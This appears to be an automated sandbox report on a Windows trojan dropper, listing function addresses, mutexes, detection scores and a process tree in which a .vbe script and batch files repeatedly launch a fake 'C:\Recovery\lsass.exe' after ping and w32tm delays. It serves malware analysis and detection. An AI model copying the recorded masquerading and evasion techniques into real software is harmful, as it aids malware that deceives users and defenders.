Code function: 0_2_00BB6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00BB6FAA

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BB848E	0_2_00BB848E
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BC00B7	0_2_00BC00B7
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BC4088	0_2_00BC4088
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BB40FE	0_2_00BB40FE
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BD51C9	0_2_00BD51C9
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BC7153	0_2_00BC7153
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BB32F7	0_2_00BB32F7
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BC62CA	0_2_00BC62CA
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BC43BF	0_2_00BC43BF
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BBC426	0_2_00BBC426
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BBF461	0_2_00BBF461
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BDD440	0_2_00BDD440
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BC77EF	0_2_00BC77EF
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BDD8EE	0_2_00BDD8EE
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BB286B	0_2_00BB286B
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BBE9B7	0_2_00BBE9B7
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BE19F4	0_2_00BE19F4
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BC6CDC	0_2_00BC6CDC
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BC3E0B	0_2_00BC3E0B
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BD4F9A	0_2_00BD4F9A
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: 0_2_00BBEFE2	0_2_00BBEFE2
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Code function: 4_2_00007FFD9BAA0D47	4_2_00007FFD9BAA0D47
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Code function: 4_2_00007FFD9BAA0E43	4_2_00007FFD9BAA0E43
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Code function: 4_2_00007FFD9BE97F2E	4_2_00007FFD9BE97F2E
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Code function: 4_2_00007FFD9BE95BBA	4_2_00007FFD9BE95BBA
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Code function: 4_2_00007FFD9BE91CD0	4_2_00007FFD9BE91CD0
Source: C:\Recovery\lsass.exe	Code function: 10_2_00007FFD9BA90D47	10_2_00007FFD9BA90D47
Source: C:\Recovery\lsass.exe	Code function: 10_2_00007FFD9BA90E43	10_2_00007FFD9BA90E43
Source: C:\Recovery\lsass.exe	Code function: 10_2_00007FFD9BE85BBA	10_2_00007FFD9BE85BBA
Source: C:\Recovery\lsass.exe	Code function: 10_2_00007FFD9BE88FB5	10_2_00007FFD9BE88FB5
Source: C:\Recovery\lsass.exe	Code function: 17_2_00007FFD9BAD1323	17_2_00007FFD9BAD1323
Source: C:\Recovery\lsass.exe	Code function: 17_2_00007FFD9BAA0D47	17_2_00007FFD9BAA0D47
Source: C:\Recovery\lsass.exe	Code function: 17_2_00007FFD9BAA0E43	17_2_00007FFD9BAA0E43
Source: C:\Recovery\lsass.exe	Code function: 17_2_00007FFD9BAB16BB	17_2_00007FFD9BAB16BB
Source: C:\Recovery\lsass.exe	Code function: 17_2_00007FFD9BE95BBA	17_2_00007FFD9BE95BBA
Source: C:\Recovery\lsass.exe	Code function: 17_2_00007FFD9BE98FB5	17_2_00007FFD9BE98FB5
Source: C:\Recovery\lsass.exe	Code function: 22_2_00007FFD9BAB1171	22_2_00007FFD9BAB1171
Source: C:\Recovery\lsass.exe	Code function: 22_2_00007FFD9BAB0D47	22_2_00007FFD9BAB0D47
Source: C:\Recovery\lsass.exe	Code function: 22_2_00007FFD9BAB12A8	22_2_00007FFD9BAB12A8
Source: C:\Recovery\lsass.exe	Code function: 22_2_00007FFD9BAB0E43	22_2_00007FFD9BAB0E43
Source: C:\Recovery\lsass.exe	Code function: 22_2_00007FFD9BEA5BBA	22_2_00007FFD9BEA5BBA
Source: C:\Recovery\lsass.exe	Code function: 22_2_00007FFD9BEAE334	22_2_00007FFD9BEAE334
Source: C:\Recovery\lsass.exe	Code function: 22_2_00007FFD9BEA8FB5	22_2_00007FFD9BEA8FB5
Source: C:\Recovery\lsass.exe	Code function: 27_2_00007FFD9BAB0D47	27_2_00007FFD9BAB0D47
Source: C:\Recovery\lsass.exe	Code function: 27_2_00007FFD9BEA5BBA	27_2_00007FFD9BEA5BBA
Source: C:\Recovery\lsass.exe	Code function: 32_2_00007FFD9BAD1323	32_2_00007FFD9BAD1323
Source: C:\Recovery\lsass.exe	Code function: 32_2_00007FFD9BAA0D47	32_2_00007FFD9BAA0D47
Source: C:\Recovery\lsass.exe	Code function: 32_2_00007FFD9BAA0E43	32_2_00007FFD9BAA0E43
Source: C:\Recovery\lsass.exe	Code function: 32_2_00007FFD9BAB16BB	32_2_00007FFD9BAB16BB
Source: C:\Recovery\lsass.exe	Code function: 32_2_00007FFD9BE95BBA	32_2_00007FFD9BE95BBA
Source: C:\Recovery\lsass.exe	Code function: 32_2_00007FFD9BE98FB5	32_2_00007FFD9BE98FB5
Source: C:\Recovery\lsass.exe	Code function: 37_2_00007FFD9BAD0D47	37_2_00007FFD9BAD0D47
Source: C:\Recovery\lsass.exe	Code function: 37_2_00007FFD9BAD0E43	37_2_00007FFD9BAD0E43
Source: C:\Recovery\lsass.exe	Code function: 37_2_00007FFD9BEC8FB5	37_2_00007FFD9BEC8FB5
Source: C:\Recovery\lsass.exe	Code function: 37_2_00007FFD9BEC5BBA	37_2_00007FFD9BEC5BBA
Source: C:\Recovery\lsass.exe	Code function: 43_2_00007FFD9BAC16BB	43_2_00007FFD9BAC16BB
Source: C:\Recovery\lsass.exe	Code function: 43_2_00007FFD9BAE1323	43_2_00007FFD9BAE1323
Source: C:\Recovery\lsass.exe	Code function: 43_2_00007FFD9BAB0D47	43_2_00007FFD9BAB0D47
Source: C:\Recovery\lsass.exe	Code function: 43_2_00007FFD9BAB0E43	43_2_00007FFD9BAB0E43
Source: C:\Recovery\lsass.exe	Code function: 43_2_00007FFD9BEA5BBA	43_2_00007FFD9BEA5BBA
Source: C:\Recovery\lsass.exe	Code function: 43_2_00007FFD9BEAE334	43_2_00007FFD9BEAE334
Source: C:\Recovery\lsass.exe	Code function: 43_2_00007FFD9BEA8FB5	43_2_00007FFD9BEA8FB5
Source: C:\Recovery\lsass.exe	Code function: 48_2_00007FFD9BAC0D47	48_2_00007FFD9BAC0D47
Source: C:\Recovery\lsass.exe	Code function: 48_2_00007FFD9BAC0E43	48_2_00007FFD9BAC0E43
Source: C:\Recovery\lsass.exe	Code function: 48_2_00007FFD9BEB5BBA	48_2_00007FFD9BEB5BBA
Source: C:\Recovery\lsass.exe	Code function: 48_2_00007FFD9BEBE334	48_2_00007FFD9BEBE334
Source: C:\Recovery\lsass.exe	Code function: 48_2_00007FFD9BEB8FB5	48_2_00007FFD9BEB8FB5
Source: C:\Recovery\lsass.exe	Code function: 53_2_00007FFD9BAF12D5	53_2_00007FFD9BAF12D5
Source: C:\Recovery\lsass.exe	Code function: 53_2_00007FFD9BAC0D47	53_2_00007FFD9BAC0D47
Source: C:\Recovery\lsass.exe	Code function: 53_2_00007FFD9BAC0E43	53_2_00007FFD9BAC0E43
Source: C:\Recovery\lsass.exe	Code function: 53_2_00007FFD9BAD16BB	53_2_00007FFD9BAD16BB
Source: C:\Recovery\lsass.exe	Code function: 53_2_00007FFD9BEB5BBA	53_2_00007FFD9BEB5BBA
Source: C:\Recovery\lsass.exe	Code function: 53_2_00007FFD9BEBE334	53_2_00007FFD9BEBE334
Source: C:\Recovery\lsass.exe	Code function: 53_2_00007FFD9BEB8FB5	53_2_00007FFD9BEB8FB5
Source: C:\Recovery\lsass.exe	Code function: 58_2_00007FFD9BAA0D47	58_2_00007FFD9BAA0D47
Source: C:\Recovery\lsass.exe	Code function: 58_2_00007FFD9BAA0E43	58_2_00007FFD9BAA0E43
Source: C:\Recovery\lsass.exe	Code function: 58_2_00007FFD9BAB16BB	58_2_00007FFD9BAB16BB
Source: C:\Recovery\lsass.exe	Code function: 58_2_00007FFD9BAD1323	58_2_00007FFD9BAD1323
Source: C:\Recovery\lsass.exe	Code function: 58_2_00007FFD9BE95BBA	58_2_00007FFD9BE95BBA
Source: C:\Recovery\lsass.exe	Code function: 58_2_00007FFD9BE98FB5	58_2_00007FFD9BE98FB5

Source: C:\Recovery\lsass.exe	Code function: String function: 00007FFD9BADCA08 appears 33 times
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: String function: 00BCEB78 appears 39 times
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: String function: 00BCF5F0 appears 31 times
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Code function: String function: 00BCEC50 appears 56 times

Source: Qsi7IgkrWa.exe, 00000000.00000003.1656969400.00000000008DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs Qsi7IgkrWa.exe
Source: Qsi7IgkrWa.exe, 00000000.00000003.1656969400.00000000008DA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs Qsi7IgkrWa.exe
Source: Qsi7IgkrWa.exe, 00000000.00000003.1657043960.00000000008ED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs Qsi7IgkrWa.exe
Source: Qsi7IgkrWa.exe, 00000000.00000003.1657043960.00000000008ED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs Qsi7IgkrWa.exe
Source: Qsi7IgkrWa.exe, 00000000.00000002.1657781101.00000000008EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs Qsi7IgkrWa.exe
Source: Qsi7IgkrWa.exe, 00000000.00000002.1657781101.00000000008EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe` vs Qsi7IgkrWa.exe
Source: Qsi7IgkrWa.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs Qsi7IgkrWa.exe

Source: Qsi7IgkrWa.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ComponentBrowserruntimeHostNet.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe0.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: lsass.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TextInputHost.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe1.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@106/93@2/1

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe

Code function: 0_2_00BB6C74 GetLastError,FormatMessageW,

0_2_00BB6C74

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe

Code function: 0_2_00BCA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00BCA6C2

Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe

File created: C:\Program Files (x86)\windows media player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe

Jump to behavior

Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe

File created: C:\Users\user\Desktop\iAcIGVjp.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
Source: C:\Recovery\lsass.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3288:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2992:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
Source: C:\Recovery\lsass.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-bYSevfnxifF6AWqcLL5C
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1640:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6372:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:120:WilError_03

Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe

File created: C:\Users\user\AppData\Local\Temp\PYXjnnJpCg

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\HypercontainerServerhostDll\Co5kty8OPng0Nyp4HYDkYO7HsD34XQHH4YSTo2iz4L3YIjbR4.bat" "

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Command line argument: sfxname	0_2_00BCDF1E
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Command line argument: sfxstime	0_2_00BCDF1E
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Command line argument: STARTDLG	0_2_00BCDF1E

Source: Qsi7IgkrWa.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Qsi7IgkrWa.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Qsi7IgkrWa.exe	ReversingLabs: Detection: 71%
Source: Qsi7IgkrWa.exe	Virustotal: Detection: 59%

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe

File read: C:\Users\user\Desktop\Qsi7IgkrWa.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Qsi7IgkrWa.exe "C:\Users\user\Desktop\Qsi7IgkrWa.exe"
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\HypercontainerServerhostDll\RHmzYjMP0dDm1pBgOIzRbUC3iX8v0CjLnvVuc2eDTHRjOJ2gOiG4vHIxjIg.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\HypercontainerServerhostDll\Co5kty8OPng0Nyp4HYDkYO7HsD34XQHH4YSTo2iz4L3YIjbR4.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe "C:\HypercontainerServerhostDll/ComponentBrowserruntimeHostNet.exe"
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jUHUXwf87c.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TqMgut2j0M.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2JnastWSjL.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5tk1CddJ7G.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\riciCmDgnt.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qoP5fBU7F9.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hR2MTpBDVc.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2juDPxCKYX.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5Fkn6foGzf.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\HypercontainerServerhostDll\RHmzYjMP0dDm1pBgOIzRbUC3iX8v0CjLnvVuc2eDTHRjOJ2gOiG4vHIxjIg.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\HypercontainerServerhostDll\Co5kty8OPng0Nyp4HYDkYO7HsD34XQHH4YSTo2iz4L3YIjbR4.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe "C:\HypercontainerServerhostDll/ComponentBrowserruntimeHostNet.exe"	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jUHUXwf87c.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"	Jump to behavior
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"	Jump to behavior
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TqMgut2j0M.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2JnastWSjL.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5tk1CddJ7G.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\riciCmDgnt.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qoP5fBU7F9.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hR2MTpBDVc.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
